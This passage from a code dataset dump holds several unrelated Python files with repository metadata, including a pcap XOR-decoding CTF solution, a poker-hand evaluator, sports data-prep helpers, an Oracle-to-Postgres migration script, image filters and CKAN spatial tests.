vax.plot(bestmodel.times,np.log(mod['V']),c=str(0.8),lw=1,zorder=1)\n\nsns.boxplot(x='algalHostTaxon',y='mu',data=allbests,ax=ax2[0])\nsns.boxplot(x='algalHostTaxon',y='phi',data=allbests,ax=ax2[1])\nsns.boxplot(x='algalHostTaxon',y='beta',data=allbests,ax=ax2[2])\n\nfor a in ax2:\n a.semilogy()\n\nkeys, counts = np.unique(bestmodels, return_counts=True)\nax4.bar(keys, counts)\nax4.set_xlabel('Number of infection states')\nax4.set_ylabel('Number of datasets')\n\n########################################################\n# save 
figures\n########################################################\n\nf1.savefig('../figures/figure1',bbox_inches='tight',pad_inches=0.1)\nf2.savefig('../figures/figure2',bbox_inches='tight',pad_inches=0.1)\nf3a.savefig('../figures/figure3a',bbox_inches='tight',pad_inches=0.1)\nf3b.savefig('../figures/figure3b',bbox_inches='tight',pad_inches=0.1)\nf3c.savefig('../figures/figure3c',bbox_inches='tight',pad_inches=0.1)\nf3d.savefig('../figures/figure3d',bbox_inches='tight',pad_inches=0.1)\nf4.savefig('../figures/figure4',bbox_inches='tight',pad_inches=0.1)\n","repo_name":"dtalmy/growth_curves","sub_path":"src/plot_output_master.py","file_name":"plot_output_master.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32324302090","text":"from scapy.all import *\nimport re\nimport base64\n\npkts = rdpcap('images_0x2.pcap')\nfor p in pkts:\n if IP in p and p[IP].dst == '140.117.169.219':\n if Raw in p and b'filename' in p[Raw].load:\n raw = p[Raw].load\n\n filename = re.search(b'filename=\"(\\w*.\\w*)\"', raw)\n filename = filename.group(1).decode('utf-8')\n \n xor_key = base64.b64decode(raw.split(b'\\r\\n')[3])\n ciphertext = raw.split(b'\\r\\n')[7]\n\n res = [ word ^ xor_key[idx % len(xor_key)] for idx, word in enumerate(ciphertext) ]\n img = open(filename, 'wb')\n img.write(bytes(res))\n img.close()\n","repo_name":"MacacaHub/CTF-writeups","sub_path":"HTCF-CTF-2020/midterm/image 0x2/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8796225160","text":"rank = dict()\r\n\r\nfor i in range(1, 10):\r\n rank[str(i)] = i\r\n \r\nfor val, r in enumerate('TJQKA', 10):\r\n rank[r] = val\r\n\r\nrank_trans = ' 123456789TJQKA'\r\n\r\ndef is_same_suit(cards):\r\n return all(c[1] == cards[0][1] for c in cards)\r\n\r\ndef Royal_Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n\r\n values = [c[0] for c in cards]\r\n values.sort()\r\n if ''.join(values) == 'AJKQT':\r\n return True, []\r\n \r\n return False, cards\r\n \r\n \r\ndef Straight_Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n\r\n values = [c[0] for c in cards]\r\n values.sort(key=lambda x: rank[x])\r\n if ''.join(values) in rank_trans:\r\n return True, []\r\n \r\n return False, cards\r\n \r\ndef Four_of_a_Kind(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n if ranks.count(ranks[0]) == 4:\r\n return ranks[0], [c for c in cards if c[0] != rank_trans[ranks[0]]]\r\n elif ranks.count(ranks[1]) == 4:\r\n return ranks[1], [c for c in cards if c[0] != rank_trans[ranks[1]]]\r\n \r\n return False, cards\r\n\r\ndef Three_of_a_Kind(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n if ranks.count(ranks[0]) == 3:\r\n return ranks[0], [c for c in cards if c[0] != rank_trans[ranks[0]]]\r\n elif ranks.count(ranks[1]) == 3:\r\n return ranks[1], [c for c in cards if c[0] != rank_trans[ranks[1]]]\r\n elif ranks.count(ranks[2]) == 3:\r\n return ranks[2], [c for c in cards if c[0] != rank_trans[ranks[2]]]\r\n \r\n return False, cards\r\n\r\ndef One_Pair(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n ranks = [rank[c[0]] for c in cards]\r\n \r\n for r in ranks:\r\n if ranks.count(r) == 2:\r\n return r, [c for c in cards if c[0] != rank_trans[r]]\r\n \r\n return False, 
cards\r\n\r\ndef Full_House(cards):\r\n res1, rest1 = Three_of_a_Kind(cards)\r\n if res1:\r\n res2, rest2 = One_Pair(rest1)\r\n if res2:\r\n return max(res1, res2), rest2\r\n return False, cards\r\n\r\ndef Flush(cards):\r\n if not is_same_suit(cards):\r\n return False, cards\r\n return True, []\r\n\r\ndef Straight(cards):\r\n values = [c[0] for c in cards]\r\n values.sort(key=lambda x: rank[x])\r\n\r\n if ''.join(values) in rank_trans:\r\n return True, []\r\n \r\n return False, cards\r\n\r\ndef Two_Pairs(cards):\r\n res1, rest1 = One_Pair(cards)\r\n if res1:\r\n res2, rest2 = One_Pair(rest1)\r\n if res2:\r\n return max(res1, res2), rest2\r\n return False, cards\r\n\r\ndef High_Card(cards):\r\n cards.sort(key=lambda c: rank[c[0]])\r\n \r\n return cards[-1], cards[0:-1]\r\n\r\ndef apply_highest(cards1, cards2):\r\n rest1 = cards1\r\n rest2 = cards2\r\n \r\n while rest1 and rest2:\r\n c1, rest1 = High_Card(rest1)\r\n c2, rest2 = High_Card(rest2)\r\n if c1[0] != c2[0]:\r\n if rank[c1[0]] > rank[c2[0]]:\r\n return 1\r\n else:\r\n return 2\r\n\r\n raise Exception('DRAW: {} {}'.format(cards1, cards2))\r\n\r\ndef apply_rules(cards1, cards2):\r\n rules_order = [Royal_Flush, Straight_Flush, Four_of_a_Kind, Full_House, Flush,\r\n Straight, Three_of_a_Kind, Two_Pairs, One_Pair]\r\n \r\n for f in rules_order:\r\n res1, rest1 = f(cards1)\r\n res2, rest2 = f(cards2)\r\n if res1 > res2:\r\n return 1\r\n elif res2 > res1:\r\n return 2\r\n \r\n if res1 and res2:\r\n return apply_highest(rest1, rest2)\r\n return apply_highest(cards1, cards2)\r\n\r\ndef check_pair(inp):\r\n cards = inp.split()\r\n return apply_rules(cards[:5], cards[5:])\r\n\r\n\r\ndef solve():\r\n wins1 = 0;\r\n with open('p054_poker.txt', 'r') as inp:\r\n for line in inp:\r\n if check_pair(line) == 1:\r\n wins1 += 1\r\n return wins1","repo_name":"XZentus/python","sub_path":"e54.py","file_name":"e54.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24540512628","text":"import os\nimport pandas as pd\n\n\ndef update_kenpom(data):\n \"\"\"\n Updates the school names in the Kenpom data to match the team names in the\n game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the Kenpom data.\n\n Returns:\n The same Kenpom data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n return update_names(data, 'Kenpom/TRank')\n\n\ndef update_TRank(data):\n \"\"\"\n Updates the school names in the T-Rank data to match the team names in the\n game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the T-Rank data.\n\n Returns:\n The same T-Rank data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n return update_names(data, 'Kenpom/TRank')\n\n\ndef update_basic(data):\n \"\"\"\n Updates the school names in the basic statistics data to match the team names\n in the game scores data.\n\n Args:\n data(DataFrame): A pandas DataFrame with the basic stats data.\n\n Returns:\n The same stats data, but with updated school names.\n\n Raises:\n AssertionError: If data is not of type pandas DataFrame.\n \"\"\"\n\n # Check 
that data is a dataframe\n if not isinstance(data, pd.DataFrame):\n raise AssertionError('Input data must be a pandas dataframe.')\n\n # Update team names to remove strange characters\n for i, row in data.iterrows():\n if '\\xa0' in row['Team']:\n team = row['Team'].replace('\\xa0', '').replace('NCAA', '')\n data.iloc[int(i), data.columns.get_loc('Team')] = team\n\n return update_names(data, 'Stats')\n\n\n# Actually updates the school names based on the schools.csv file.\ndef update_names(data, type):\n\n # Load school name data\n path = os.path.dirname(os.path.abspath(__file__)) + '/../../Data/Resources/schools.csv'\n school_names = pd.read_csv(path)\n stats = school_names.loc[:, type]\n scores = school_names.loc[:, 'Scores']\n\n # Create the dictionary from the two lists\n names_dict = dict(zip(stats, scores))\n\n # Go through schools in the data and replace school names in the dictionary with the right name\n for i, row in data.iterrows():\n if row['Team'] in names_dict:\n data.iloc[int(i), data.columns.get_loc('Team')] = names_dict[row['Team']]\n\n return data\n\n\n# Checks that all of the school names in the stats datasets are correctly in the scores datasets\ndef check_for_missing_names(scores_df, stats_df, verbose=False):\n\n # Check that each school in the stats df is in the scores df\n missing_names = []\n for name in stats_df['Team'].unique():\n if name not in scores_df['Home'].values or name not in scores_df['Away'].values:\n missing_names.append(name)\n\n if verbose:\n print(\"Checked {0} schools and found {1} matches.\".format(len(stats_df), len(missing_names)))\n return missing_names\n","repo_name":"pjmartinkus/College_Basketball","sub_path":"collegebasketball/data_prep/DataPrep.py","file_name":"DataPrep.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9393426685","text":"from bs4 import BeautifulSoup\nimport requests\npage_count = 1\nmax_page_count= 1021\nurl=\"https://www.imdb.com/search/title/?title_type=feature,tv_movie&user_rating=7.0,10.0&adult=include&sort=num_votes,desc&count=250&start=1&ref_=adv_nxt\"\nwhile (page_count\").format(self.name,\n self.length,\n self.beam,\n self.draft,\n self.tonnage)\n \nBase.metadata.create_all(engine) \n \ndef add_ships():\n \n session = Session()\n \n big_ship = Ship(name='Titanic',\n length=269.1,\n beam=28.0,\n draft=10.5,\n tonnage=46328.\n )\n \n little_ship = Ship(name='Maid of the Loch',\n length=58.2,\n beam=8.6,\n draft=1.37,\n tonnage=555.\n )\n \n session.add(big_ship)\n session.add(little_ship)\n session.commit()\n \n return \n\n","repo_name":"DTOcean/aneris","sub_path":"tests/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3860056164","text":"from dotenv import dotenv_values\nfrom psycopg2 import Error\nimport psycopg2\nimport numpy\nimport os\nimport cx_Oracle\nimport time\nimport sys\nimport datetime\nimport csv\n\nconfig = dotenv_values(\".env\")\n\noracle_host = config['ORACLE_HOST']\noracle_port = config['ORACLE_PORT']\noracle_service = config['ORACLE_SERVICE_NAME']\noracle_user = config['ORACLE_USER']\noracle_pass = config['ORACLE_PASS']\n\npostgres_host = config['POSTGRES_HOST']\npostgres_port = config['POSTGRES_PORT']\npostgres_database = config['POSTGRES_DATABASE_NAME']\npostgres_user = config['POSTGRES_USER']\npostgres_pass = config['POSTGRES_PASS']\n\ndsn_tns = 
cx_Oracle.makedsn(oracle_host, oracle_port, service_name=oracle_service)\nconnection = cx_Oracle.connect(\n user=oracle_user,\n password=oracle_pass,\n dsn=dsn_tns)\n\nif connection:\n print(\"Successfully connected to Oracle Database\")\n cursor = connection.cursor()\n\ntry:\n connectionPostgres = psycopg2.connect(user=postgres_user,\n password=postgres_pass,\n host=postgres_host,\n port=postgres_port,\n database=postgres_database)\n cursorPostgres = connectionPostgres.cursor()\n cursorPostgres.execute(\"SELECT version();\")\n record = cursorPostgres.fetchone()\n print(\"You are connected to - \", record, \"\\n\")\nexcept (Exception, Error) as error:\n print(\"Error while connecting to PostgreSQL\", error)\nfinally:\n print(\"PostgreSQL connection is complete\")\n\ndef progress(count, total, match, status=''):\n if count % match == 0:\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n percents = round((100.0 * count / float(total)) + 1, 2)\n if percents >= 100 :\n percents = 100\n\n bar = '=' * filled_len + '-' * (bar_len - (filled_len + 1))\n\n sys.stdout.write('%s : [%s] %s%s \\r' % (status, bar, percents, '%'))\n sys.stdout.flush() \n\ndef convertArrayToList(arr):\n listData = list(arr)\n return listData\n\ndef csvNameFormat(name_file):\n name = name_file.upper().replace('.', '_') + \".csv\"\n return name\n\ndef queryColumnName(tableName, flag):\n tableQuery = tableName.split('.')\n sql = \"\"\" SELECT \n OWNER,\n TABLE_NAME,\n COLUMN_NAME,\n DATA_TYPE,\n DATA_LENGTH,\n DATA_PRECISION,\n DATA_SCALE\n FROM ALL_TAB_COLS\n WHERE TABLE_NAME = '{1}'\n AND OWNER = '{0}'\n AND COLUMN_NAME NOT IN ( 'PASSWORD', 'VERSION', 'ID' )\n ORDER BY COLUMN_ID ASC \"\"\".format(tableQuery[0], tableQuery[1])\n cursor.execute(sql)\n listTableName = []\n while True:\n rows = cursor.fetchone()\n if rows is None:\n break\n # print(rows)\n if flag == 1:\n listTableName.append(rows[2].lower())\n if flag == 2:\n listTableName.append(rows)\n return listTableName\n\ndef headerColumn(listColumnName):\n listColumn = listColumnName\n l = len(listColumn) - 1\n i = 0\n header = '';\n\n for d in listColumn:\n if i == l:\n header = header + d\n else:\n header = header + d + ','\n i = i + 1\n header = header + ''\n return header\n\ndef convertType(datatype, datalength, precision, scale):\n switcher = {\n \"CHAR\": 'CHAR({0})'.format(datalength),\n \"VARCHAR\": 'VARCHAR({0})'.format(datalength),\n \"VARCHAR2\": 'VARCHAR({0})'.format(datalength),\n \"NUMBER\": 'NUMERIC({0},{1})'.format(precision, scale),\n \"DATE\": 'DATE'\n }\n return switcher.get(datatype, -1)\n\ndef sqlPaserCreateTable(data, tablename):\n tableName = tablename\n sql = \"\"\"\n DROP TABLE IF EXISTS {0};\n CREATE TABLE {0}(\"\"\".format(tableName)\n length = len(data) - 1\n for idx, val in enumerate(data):\n datatype = convertType(val[3], val[4], val[5], val[6])\n if datatype == -1:\n print(\"Not match datatype to convert for postgres database = Column:{0}, Type:{1}\". 
format(val[2], val[4]))\n            exit()\n        if idx == length:\n            sql = sql + \"\\n {0} {1}\".format(val[2], datatype) + \"\\n);\"\n        else:\n            sql = sql + \"\\n {0} {1}\".format(val[2], datatype) + \",\"\n    return sql\n\ndef convertDataToCsv(tablename):\n    tableName = tablename\n    tableColumnName = queryColumnName(tableName, 1)\n    sqlCount = \"SELECT COUNT(*) FROM {0} WHERE ROWNUM <= 50 ORDER BY bill_period DESC\".format(tableName)\n    sql = \"SELECT * FROM {0} WHERE ROWNUM <= 50 ORDER BY bill_period DESC\".format(tableName)\n    #sqlCount = \"SELECT COUNT(*) FROM {0} \".format(tableName)\n    #sql = \"SELECT * FROM {0}\".format(tableName)\n    cursor.execute(sqlCount)\n    count = cursor.fetchone()\n    count = count[0]\n    print(\"Count {0}\".format(count))\n    cursor.execute(sql)\n\n    timeNow = datetime.datetime.now().isoformat()\n    print(\"{0} : (Table={1}) Waiting query data to csv...\".format(timeNow, tableName))\n    fileName = csvNameFormat(tableName)\n    csv_file = open(fileName, 'w')\n    csv_writer = csv.writer(csv_file, delimiter=\",\", lineterminator='\\r\\n', quotechar = '\\\\')\n    i = 0\n    header = headerColumn(tableColumnName)\n    # header is already a comma-joined string; write it directly (writerow would split it into single characters)\n    csv_file.write(header + '\\r\\n')\n    while True:\n        row = cursor.fetchone()\n        if row is None:\n            break\n        row = convertArrayToList(row)\n        csv_writer.writerow(row)\n        progress(i, count, 10, status='Query data to csv')\n        i += 1\n\n    timeNow = datetime.datetime.now().isoformat()\n    print(\"{0} : (Table={1}) Downloaded.\".format(timeNow, tableName))\n    del(count)\n    del(timeNow)\n\ndef csvToDatabase(tableName, targetTable):\n    fileName = csvNameFormat(tableName)\n    tableColumnName = queryColumnName(tableName, 1)\n    tableColumn = queryColumnName(tableName, 2)\n    sqlCreateTable = sqlPaserCreateTable(tableColumn, targetTable)\n    cursorPostgres.execute(sqlCreateTable)\n    np_arr1 = numpy.array(tableColumnName)\n    with open(fileName, 'r') as f:\n        next(f) # Skip the header row.\n        cursorPostgres.copy_from(f, targetTable, sep=',', columns=np_arr1)\n    connectionPostgres.commit()\n\ndef migrateExecute(call_procedure):\n    sql = call_procedure\n    timeNow = datetime.datetime.now().isoformat()\n    print(\"{0} : (Procedure={1}) Executing....\\r\".format(timeNow, sql))\n    cursorPostgres.execute(sql)\n    record = cursorPostgres.fetchone()\n    time.sleep(1.5)\n    timeNow = datetime.datetime.now().isoformat()\n    print(\"{0} : (Procedure={1}) Executed.\\r\".format(timeNow, sql))\n\nconvertDataToCsv('BILL.UNIT_PROCESS')\nconvertDataToCsv('BILL.FT_MASTER')\ncsvToDatabase('BILL.UNIT_PROCESS', 'unit_process')\ncsvToDatabase('BILL.FT_MASTER', 'ft_master')\nmigrateExecute(\"SELECT 1, 2;\")\nmigrateExecute(\"SELECT 1, 3;\")\n\nwhile True:\n    time.sleep(0.100)\n    pass\n","repo_name":"prtha112/oracle-to-postgres","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"9136364900","text":"import numpy as np\nimport pickle\n\n\ndef get_agent_state_value_functions(learning_manager, init_tables=None):\n    # copy learned tables into init tables for initializing test manager and later learning managers\n    if init_tables is None:\n        init_tables = [{}, {}]\n\n    for type, func_dict in learning_manager.experiment_instance.function.function_dict.items():\n        if type not in init_tables[0]:\n            init_tables[0][type] = {}\n        if isinstance(func_dict, dict):\n            for type2, function in func_dict.items():\n                if type2 not in init_tables[0][type]:\n                    init_tables[0][type][type2] = function\n        else:\n            init_tables[0][type] = func_dict\n\n    for instance in 
learning_manager.in_task_instances:\n if instance.task.task_type not in init_tables[1]:\n init_tables[1][instance.task.task_type] = instance.function.function\n\n return init_tables\n\n\ndef sparse_output(reward_at_step, state_sequence, task_at_step, costs_at_step):\n sp_reward_at_step = [0]\n sp_state_sequence = [state_sequence[0]]\n sp_task_at_step = [task_at_step[0]]\n sp_costs_at_step = [costs_at_step[0]]\n reward = reward_at_step[0]\n\n for i in range(1, len(state_sequence)):\n if state_sequence[i] != sp_state_sequence[-1]:\n sp_reward_at_step[-1] = reward\n sp_reward_at_step.append(0)\n sp_state_sequence.append(state_sequence[i])\n sp_task_at_step.append(task_at_step[i])\n sp_costs_at_step.append(costs_at_step[i])\n reward = 0\n\n reward += reward_at_step[i]\n\n return np.array(sp_reward_at_step), np.array(sp_state_sequence), sp_task_at_step, np.array(sp_costs_at_step)\n\n\ndef get_state_trajectory(trajectory):\n obs = trajectory[0]\n num_visited_states = 1\n start_time = obs.time\n obs.time = 0\n state_trajectory = [obs]\n for i in range(1, len(trajectory)):\n if trajectory[i].state_estimate != obs.state_estimate or trajectory[i].task_id != obs.task_id:\n num_visited_states += 1\n obs = trajectory[i]\n obs.time -= start_time\n state_trajectory.append(obs)\n\n return state_trajectory, num_visited_states\n\n\ndef load_pkl_file(file_path):\n with open(file_path, 'rb') as f:\n pkl_obj = pickle.load(f)\n return pkl_obj\n\n\ndef add_trajectories_to_task(task_list, trajectory_list):\n for i in range(len(task_list)):\n task_list[i].trajectories = trajectory_list[task_list[i].task_type]\n\n\ndef add_state_distribution_to_task(task_list, distribution_list):\n for i in range(len(task_list)):\n task_list[i].delta_state_distribution = distribution_list[task_list[i].task_type]","repo_name":"christophgebhardt/task-interleaving","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10387577883","text":"import scipy.ndimage as ndi\nimport numpy as np\nimport skimage.io as io\nimport matplotlib.pyplot as plt\n\nc=io.imread('C:\\\\Users\\\\kamel\\\\Music\\\\misc\\\\cameraman.tif')\ncmax=ndi.generic_filter(c,max,[3,3])\nio.imshow(cmax)\nio.show()\n\ncmin=ndi.minimum_filter(c,size=(3,3))\nio.imshow(cmin)\nio.show()\n\ncm=ndi.median_filter(c,size=(3,3))\nio.imshow(cm)\nio.show()\ncm2=ndi.rank_filter(c,4,size=(3,3))\nio.imshow(cm2)\nio.show()\n","repo_name":"KameliaZaman/DIP-Lab","sub_path":"RnD/Neighborhood/task8.py","file_name":"task8.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18475617019","text":"from traceback import print_tb\nfrom package.app.api.modules.resignation.ResignationController import ResignationController\nfrom package.app.client.dialog.DialogService import DialogService\nfrom package.app.client.dialog.InfoBox import InfoBoxProps\nfrom package.app.client.gui.box.Box import Box\nfrom package.app.client.modules.resignation.ResignationValidator import (\n ResignationValidator,\n)\nfrom package.app.client.state.ComponentState import ComponentState\nfrom package.app.meta.Singleton import Singleton\nfrom package.app.client.utils.form import getEntryBuffer\nfrom package.app.api.modules.resignation.dto.ResignationDto import ResignationDto\nfrom package.app.client.gui.imports import Gtk\nfrom package.app.validation.IValidator import 
IValidator\nfrom datetime import datetime\n\n\nclass ResignationComponent(metaclass=Singleton):\n def __init__(self):\n self.__state = ComponentState()\n self.__validator: IValidator = ResignationValidator()\n self.__controller = ResignationController()\n self.__dialogService = DialogService()\n\n def requestRegistration(self, selectedEmployeeId, selectedResignationTypeId, memoText) -> bool:\n\n memo = memoText\n selectedEmployee = self.getEmployeeById(\n selectedEmployeeId)\n selectedResignationType = self.getResignationTypeById(\n selectedResignationTypeId)\n\n try:\n dto = ResignationDto(\n employee_id=selectedEmployee.user_id,\n resignation_type_id=selectedResignationType.id,\n date = datetime.now(),\n memo = memo,\n employee = selectedEmployee,\n resignation_type = selectedResignationType,\n )\n except AttributeError:\n dto = ResignationDto(\n employee_id=None,\n resignation_type_id=None,\n date = None,\n memo = None,\n employee = None,\n resignation_type = None,\n )\n\n if self.__validator.execute(dto):\n entity = self.__controller.registerResignation(dto)\n if entity:\n self.__displaySuccessMessage()\n return True\n \n return False\n\n def getState(self) -> ComponentState:\n return self.__state\n\n def __displaySuccessMessage(self):\n content = Box()\n content.pack_default(Gtk.Label(\"A demissão foi corretamente executada!\"))\n self.__dialogService.displayInfoBox(\n InfoBoxProps(title=\"Demissão executada\", content=content)\n )\n\n def getEmployees(self):\n return self.__controller.getEmployees()\n\n def getResignationTypes(self):\n return self.__controller.getResignationTypes()\n\n def getEmployeeById(self, id):\n return self.__controller.getEmployeeById(id)\n\n def getResignationTypeById(self, resignationId):\n return self.__controller.getResignationTypeById(\n resignationId)\n\n def changeEmployeeRegisterStatus(self, id:int):\n return self.__controller.changeEmployeeRegisterStatus(id)\n","repo_name":"BrunoBross/A1A-Car-Wash","sub_path":"package/app/client/modules/resignation/ResignationComponent.py","file_name":"ResignationComponent.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39482230603","text":"#!/usr/bin/env python\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nversion = file('version.txt').read().strip()\n\nsetup(name='icalendar',\n package_dir={'': 'src'},\n packages=['icalendar'],\n version=version,\n\n # metadata for upload to PyPI\n author='MaxM',\n author_email='maxm@mxm.dk',\n description='iCalendar parser/generator',\n license='GPL2.1',\n keywords='calendar icalendar',\n url='http://codespeak.net/icalendar/',\n long_description=\"\"\"iCalendar is a parser/generator of iCalendar files \n (RFC 2445) for use with Python.\"\"\",\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: GNU General Public License (GPL)',\n 'Operating System :: OS Independent'],\n platforms='All',\n )","repo_name":"ryba-xek/iCalendar","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"20151535440","text":"import pickle\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import r2_score\nfrom scipy.stats import pearsonr, spearmanr\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport 
nibabel as nib\nfrom nilearn import plotting\n\n\ndef pearsonr_cor_func(obs,pred):\n return(pearsonr(obs,pred)[0])\n\ndef spearmanr_cor_func(obs,pred):\n return(spearmanr(obs,pred)[0])\n\n \ndef within_group_performance(results,cor_func,\n group_col_name='result_group',\n obs_col_name='y',\n pred_col_name='y_pred'\n \n ):\n results[obs_col_name] = results[obs_col_name].astype(float)\n results[pred_col_name] = results[pred_col_name].astype(float)\n within_subj_predictions = []\n for group in results[group_col_name].unique():\n group_results = results.loc[results[group_col_name]==group,].copy()\n\n #get means and SDs\n obs_mean = np.mean(group_results[obs_col_name])\n pred_mean = np.mean(group_results[pred_col_name])\n obs_sd = np.std(group_results[obs_col_name])\n pred_sd = np.std(group_results[pred_col_name])\n\n #mean center\n group_results[obs_col_name] = (group_results[obs_col_name] - obs_mean)\n group_results[pred_col_name] = (group_results[pred_col_name] - pred_mean)\n\n within_subj_prediction = pearsonr(group_results[obs_col_name],group_results[pred_col_name])[0]\n #print(within_subj_prediction)\n #print(math.pow(pearsonr(group_results[obs_col_name],group_results['y_pred'])[0],2))\n\n\n #what if we we re-ranked the predicted values into groups along the \n if (within_subj_prediction< (-0.5)):\n\n sp = sns.scatterplot(group_results[obs_col_name],group_results[pred_col_name])\n plt.show()\n display(pd.DataFrame(group_results.groupby(obs_col_name).y_pred.mean()))\n #display(group_results)\n within_subj_predictions = within_subj_predictions + [within_subj_prediction]\n return(within_subj_predictions)","repo_name":"UOSAN/DEV_scripts","sub_path":"fMRI/ml/.ipynb_checkpoints/measure_results-checkpoint.py","file_name":"measure_results-checkpoint.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19834155792","text":"import random\nimport sys\nimport os\n\n#Number of tests\ntests = int(sys.argv[1])\n#Parameters to run against script\nn = int(sys.argv[2])\n#Range of random numbers\nm = int(sys.argv[3])\n\nos.system(\"python3 genRandom.py \" + str(n) + \" \" + str(m) + \" > input.txt\")\n \nwith open(\"input.txt\") as fp:\n for i in fp:\n os.system(\"python3 change.py \" + str(i))\n\n\n","repo_name":"lumunge/100-days-of-code","sub_path":"Algorithms/GreedyAlgorithms/change/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12728674293","text":"import aiogram.utils.markdown as fmt\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext, filters\n\nfrom loader import dp\nfrom messages.config import ASSET_EMOJI\nfrom states.asset_state import AssetState\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('share')), state=AssetState)\nasync def cmd_share(message: types.Message, state: FSMContext):\n type_asset = 'share'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n\n # await AssetState.next()\n await state.update_data(type_asset='share')\n await message.answer('Введите тикер акции, уникальное короткое название инструмента (длина: 1-6 символов).')\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('etf')), state=AssetState)\nasync def cmd_fund(message: types.Message, state: FSMContext):\n type_asset = 'etf'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n await message.answer('Введите 
тикер фонда, уникальное короткое название инструмента (длина: 1-6 символов).')\n\n\n@dp.message_handler(filters.Text(equals=ASSET_EMOJI.get('crypto')), state=AssetState)\nasync def cmd_crypto(message: types.Message, state: FSMContext):\n type_asset = 'crypto'\n async with state.proxy() as data:\n data['type_asset'] = type_asset\n await message.answer('Введите тикер отношения, например: \"BTCUSDT\"')\n","repo_name":"Fantastickck/assets-info-bot--aiogram","sub_path":"handlers/users/market_data/type_asset.py","file_name":"type_asset.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73832309493","text":"import logging\nimport json\nfrom pprint import pprint\nfrom nose.plugins.skip import SkipTest\nfrom nose.tools import assert_equal, assert_raises\nfrom ckan.logic.action.create import package_create\nfrom ckan.logic.action.delete import package_delete\nfrom ckan.logic.schema import default_create_package_schema\nfrom ckan import model\n\nfrom ckan.model import Package, Session\nimport ckan.lib.search as search\nfrom ckan.tests import CreateTestData, setup_test_search_index,WsgiAppCase\nfrom ckan.tests.functional.api.base import ApiTestCase\nfrom ckan.tests import TestController as ControllerTestCase\nfrom ckanext.spatial.tests.base import SpatialTestBase\n\nlog = logging.getLogger(__name__)\n\n\n\nclass TestSpatialApi(ApiTestCase,SpatialTestBase,ControllerTestCase):\n\n api_version = '2'\n\n @classmethod\n def setup_class(self):\n super(TestSpatialApi,self).setup_class()\n setup_test_search_index()\n CreateTestData.create_test_user()\n self.package_fixture_data = {\n 'name' : u'test-spatial-dataset-search-point',\n 'title': 'Some Title',\n 'extras': [{'key':'spatial','value':self.geojson_examples['point']}]\n }\n self.base_url = self.offset('/search/dataset/geo')\n\n def _offset_with_bbox(self,minx=-180,miny=-90,maxx=180,maxy=90,crs=None):\n offset = self.base_url + '?bbox=%s,%s,%s,%s' % (minx,miny,maxx,maxy)\n if crs:\n offset = offset + '&crs=%s' % crs\n return offset\n\n def test_basic_query(self):\n schema = default_create_package_schema()\n context = {'model':model,'session':Session,'user':'tester','extras_as_string':True,'schema':schema,'api_version':2}\n package_dict = package_create(context,self.package_fixture_data)\n package_id = context.get('id')\n\n # Point inside bbox\n offset = self._offset_with_bbox()\n\n res = self.app.get(offset, status=200)\n res_dict = self.data_from_res(res)\n\n assert res_dict['count'] == 